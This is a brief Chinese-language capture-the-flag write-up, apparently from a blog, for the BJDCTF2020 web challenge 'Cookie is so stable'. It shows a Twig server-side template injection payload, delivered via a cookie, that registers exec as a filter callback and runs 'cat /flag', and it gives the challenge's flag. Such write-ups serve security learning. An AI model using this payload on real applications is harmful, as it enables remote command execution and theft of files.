酷炫的欢迎界面,有1个flag.php和hint.php
hint.php的页面元素发现了提示
去flag.php发现存在模板注入
然后提示说研究cookie,使用payload
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};
flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}
[BJDCTF2020] web题-Cookie is so stable
最新推荐文章于 2024-06-13 07:36:50 发布